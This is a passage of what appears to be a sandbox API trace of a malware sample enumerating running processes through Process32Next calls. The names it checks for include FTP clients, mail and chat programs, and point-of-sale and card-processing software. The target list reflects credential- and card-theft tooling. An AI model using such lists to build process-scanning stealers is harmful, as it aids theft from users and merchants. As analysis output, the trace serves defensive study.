th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="action program citizen.exe")) returned 1 [0263.213] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdb4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="reachinvolve.exe")) returned 1 [0263.218] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="question.exe")) returned 1 [0263.220] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdcc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="play hit.exe")) returned 1 [0263.222] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdd8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="mean.exe")) returned 1 [0263.224] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xde0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="evening.exe")) returned 1 [0263.226] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdf8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="memory everybody nature.exe")) returned 1 [0263.228] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="structurecausebar.exe")) returned 1 [0263.230] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe10, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="good.exe")) returned 1 [0263.235] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe18, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="item study safe.exe")) returned 1 [0263.237] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe28, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="health-prove-opportunity.exe")) returned 1 [0263.239] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe30, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="break.exe")) returned 1 [0263.241] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe44, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="minute-budget-themselves.exe")) returned 1 [0263.243] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe50, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="3dftp.exe")) returned 1 [0263.245] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="absolutetelnet.exe")) returned 1 [0263.301] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe64, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="alftp.exe")) returned 1 [0263.303] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe6c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="barca.exe")) returned 1 [0263.305] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe7c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="bitkinex.exe")) returned 1 [0263.307] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="coreftp.exe")) returned 1 [0263.313] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe98, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="far.exe")) returned 1 [0263.315] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xea0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="filezilla.exe")) returned 1 [0263.317] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xeb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="flashfxp.exe")) returned 1 [0263.319] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xeb8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="fling.exe")) returned 1 [0263.321] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xec4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="foxmailincmail.exe")) returned 1 [0263.324] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xecc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="gmailnotifierpro.exe")) returned 1 [0263.330] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xedc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="icq.exe")) returned 1 [0263.332] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xee4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="leechftp.exe")) returned 1 [0263.335] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xef8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="ncftp.exe")) returned 1 [0263.337] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="notepad.exe")) returned 1 [0263.339] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf10, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="operamail.exe")) returned 1 [0263.357] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf18, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="outlook.exe")) returned 1 [0263.359] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf24, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="pidgin.exe")) returned 1 [0263.362] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf2c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="scriptftp.exe")) returned 1 [0263.364] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf40, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="skype.exe")) returned 1 [0263.365] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf48, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="smartftp.exe")) returned 1 [0263.367] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf54, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="thunderbird.exe")) returned 1 [0263.370] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf5c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="trillian.exe")) returned 1 [0263.375] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="webdrive.exe")) returned 1 [0263.377] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf78, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="whatsapp.exe")) returned 1 [0263.380] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="winscp.exe")) returned 1 [0263.382] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf90, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="yahoomessenger.exe")) returned 1 [0263.384] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="active-charge.exe")) returned 1 [0263.386] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfa4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="accupos.exe")) returned 1 [0263.392] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfb8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="afr38.exe")) returned 1 [0263.394] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfc0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="aldelo.exe")) returned 1 [0263.397] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfcc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="ccv_server.exe")) returned 1 [0263.399] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfdc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="centralcreditcard.exe")) returned 1 [0263.401] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfe4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="creditservice.exe")) returned 1 [0263.458] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xff0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="edcsvr.exe")) returned 1 [0263.460] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x594, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="fpos.exe")) returned 1 [0263.462] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd48, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="isspos.exe")) returned 1 [0263.464] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="mxslipstream.exe")) returned 1 [0263.469] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1004, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="omnipos.exe")) returned 1 [0263.471] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x100c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="spcwin.exe")) returned 1 [0263.472] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1018, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="spgagentservice.exe")) returned 1 [0263.474] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1028, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="utg2.exe")) returned 1 [0263.476] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1034, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="likely-final-out.exe")) returned 1 [0263.477] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x103c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="local reality bank.exe")) returned 1 [0263.479] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1048, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="kitchen-box-instead.exe")) returned 1 [0263.480] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1058, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x9dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0263.482] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0263.486] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x127c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0263.487] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1358, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0263.489] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1174, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0263.490] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1174, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 0 [0263.491] CloseHandle (hObject=0x9e0) returned 1 [0263.492] Sleep (dwMilliseconds=0x64) [0263.691] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x9e0 [0263.712] Process32First (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0263.716] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x79, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0263.721] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x138, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0263.723] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x17c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0263.725] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x17c, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0263.736] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0263.738] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0263.740] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0263.742] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x21c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0263.744] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x274, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0263.832] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0263.834] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x30c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1fc, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0263.836] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x360, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4a, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0263.839] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x378, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0263.844] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x390, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0263.845] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0263.847] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0263.848] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x210, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 